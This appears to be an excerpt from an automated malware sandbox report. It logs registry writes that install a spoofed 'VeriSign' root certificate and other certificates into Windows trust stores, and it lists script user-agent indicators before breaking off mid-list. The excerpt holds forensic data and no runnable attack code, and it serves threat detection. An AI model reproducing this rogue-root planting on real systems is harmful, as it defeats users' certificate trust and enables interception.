5c00000001000000040000000004000019000000010000001000000070f978f1c877bc8a437fe55f408e342e0f0000000100000020000000c0e18a8cf9c6795cd51462a257943cec8893f6b235f4dc34103182ce7ebbb22f030000000100000014000000edd4b1559255edd0adb9d0da108aba221ca10ab414000000010000001400000006b5bc82432489e9d902a68eb6772cbeae0b91ca040000000100000010000000c2dc8895b1723efeb18c611f97deac572000000001000000ec020000308202e830820251a003020102020874af2d9114d41e4b300d06092a864886f70d01010b05003081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553301e170d3139303832353132323332315a170d3233303832343132323332315a3081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100c91e94712e8fb5b2578f14350940415f7b86ad019031c2c6ac9fdfec47cff9d93a4046627d16c817aa0d994fc25280487e82fe650d87992b56240dfbbd3828e5d311112248379a4e54121b4c37e7c32fbff13f32834c35095d76a4f3e220223abe36bb5c22870f46aea1c377ceeae9e476aaa8ca4e26c9262985bb671609353b0203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735300d06092a864886f70d01010b050003818100723d1aa0711e110572274040b91a24679030b90bccf2f219dabf7c677b66c8765294490d43caf97282745aebae8afe65c68fc1e8eb4b976ae3bbb2a0c7d4b5bae7be02a1ae00f31a78d7f9f6375665d0ffaad4794de71eb03014b8709a7b806fbbb1f0395fa8f4e672c95a103017dee4df89e4789ec4fafecf1ae2af4087af56 FBFC.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4 RUNDLL32.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = 0f0000000100000020000000c0e18a8cf9c6795cd51462a257943cec8893f6b235f4dc34103182ce7ebbb22f030000000100000014000000edd4b1559255edd0adb9d0da108aba221ca10ab42000000001000000ec020000308202e830820251a003020102020874af2d9114d41e4b300d06092a864886f70d01010b05003081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553301e170d3139303832353132323332315a170d3233303832343132323332315a3081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100c91e94712e8fb5b2578f14350940415f7b86ad019031c2c6ac9fdfec47cff9d93a4046627d16c817aa0d994fc25280487e82fe650d87992b56240dfbbd3828e5d311112248379a4e54121b4c37e7c32fbff13f32834c35095d76a4f3e220223abe36bb5c22870f46aea1c377ceeae9e476aaa8ca4e26c9262985bb671609353b0203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735300d06092a864886f70d01010b050003818100723d1aa0711e110572274040b91a24679030b90bccf2f219dabf7c677b66c8765294490d43caf97282745aebae8afe65c68fc1e8eb4b976ae3bbb2a0c7d4b5bae7be02a1ae00f31a78d7f9f6375665d0ffaad4794de71eb03014b8709a7b806fbbb1f0395fa8f4e672c95a103017dee4df89e4789ec4fafecf1ae2af4087af56 Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = 14000000010000001400000006b5bc82432489e9d902a68eb6772cbeae0b91ca030000000100000014000000edd4b1559255edd0adb9d0da108aba221ca10ab40f0000000100000020000000c0e18a8cf9c6795cd51462a257943cec8893f6b235f4dc34103182ce7ebbb22f2000000001000000ec020000308202e830820251a003020102020874af2d9114d41e4b300d06092a864886f70d01010b05003081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553301e170d3139303832353132323332315a170d3233303832343132323332315a3081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100c91e94712e8fb5b2578f14350940415f7b86ad019031c2c6ac9fdfec47cff9d93a4046627d16c817aa0d994fc25280487e82fe650d87992b56240dfbbd3828e5d311112248379a4e54121b4c37e7c32fbff13f32834c35095d76a4f3e220223abe36bb5c22870f46aea1c377ceeae9e476aaa8ca4e26c9262985bb671609353b0203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735300d06092a864886f70d01010b050003818100723d1aa0711e110572274040b91a24679030b90bccf2f219dabf7c677b66c8765294490d43caf97282745aebae8afe65c68fc1e8eb4b976ae3bbb2a0c7d4b5bae7be02a1ae00f31a78d7f9f6375665d0ffaad4794de71eb03014b8709a7b806fbbb1f0395fa8f4e672c95a103017dee4df89e4789ec4fafecf1ae2af4087af56 Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = 040000000100000010000000c2dc8895b1723efeb18c611f97deac5714000000010000001400000006b5bc82432489e9d902a68eb6772cbeae0b91ca030000000100000014000000edd4b1559255edd0adb9d0da108aba221ca10ab40f0000000100000020000000c0e18a8cf9c6795cd51462a257943cec8893f6b235f4dc34103182ce7ebbb22f19000000010000001000000070f978f1c877bc8a437fe55f408e342e2000000001000000ec020000308202e830820251a003020102020874af2d9114d41e4b300d06092a864886f70d01010b05003081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553301e170d3139303832353132323332315a170d3233303832343132323332315a3081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100c91e94712e8fb5b2578f14350940415f7b86ad019031c2c6ac9fdfec47cff9d93a4046627d16c817aa0d994fc25280487e82fe650d87992b56240dfbbd3828e5d311112248379a4e54121b4c37e7c32fbff13f32834c35095d76a4f3e220223abe36bb5c22870f46aea1c377ceeae9e476aaa8ca4e26c9262985bb671609353b0203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735300d06092a864886f70d01010b050003818100723d1aa0711e110572274040b91a24679030b90bccf2f219dabf7c677b66c8765294490d43caf97282745aebae8afe65c68fc1e8eb4b976ae3bbb2a0c7d4b5bae7be02a1ae00f31a78d7f9f6375665d0ffaad4794de71eb03014b8709a7b806fbbb1f0395fa8f4e672c95a103017dee4df89e4789ec4fafecf1ae2af4087af56 FBFC.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4 Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\EDD4B1559255EDD0ADB9D0DA108ABA221CA10AB4\Blob = 19000000010000001000000070f978f1c877bc8a437fe55f408e342e0f0000000100000020000000c0e18a8cf9c6795cd51462a257943cec8893f6b235f4dc34103182ce7ebbb22f030000000100000014000000edd4b1559255edd0adb9d0da108aba221ca10ab414000000010000001400000006b5bc82432489e9d902a68eb6772cbeae0b91ca2000000001000000ec020000308202e830820251a003020102020874af2d9114d41e4b300d06092a864886f70d01010b05003081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553301e170d3139303832353132323332315a170d3233303832343132323332315a3081863146304406035504030c3d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100c91e94712e8fb5b2578f14350940415f7b86ad019031c2c6ac9fdfec47cff9d93a4046627d16c817aa0d994fc25280487e82fe650d87992b56240dfbbd3828e5d311112248379a4e54121b4c37e7c32fbff13f32834c35095d76a4f3e220223abe36bb5c22870f46aea1c377ceeae9e476aaa8ca4e26c9262985bb671609353b0203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d56653072695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735300d06092a864886f70d01010b050003818100723d1aa0711e110572274040b91a24679030b90bccf2f219dabf7c677b66c8765294490d43caf97282745aebae8afe65c68fc1e8eb4b976ae3bbb2a0c7d4b5bae7be02a1ae00f31a78d7f9f6375665d0ffaad4794de71eb03014b8709a7b806fbbb1f0395fa8f4e672c95a103017dee4df89e4789ec4fafecf1ae2af4087af56 Esplorarne.exe.com -
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 32 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 181 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 214 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 215 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 222 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 231 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 363 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 164 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 232 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 278 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 345 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 404 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 412 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 492 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 194 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 224 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 228 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 450 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 196 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 241 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 173 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 220 Mozilla/4.0 (compatible; Win32; 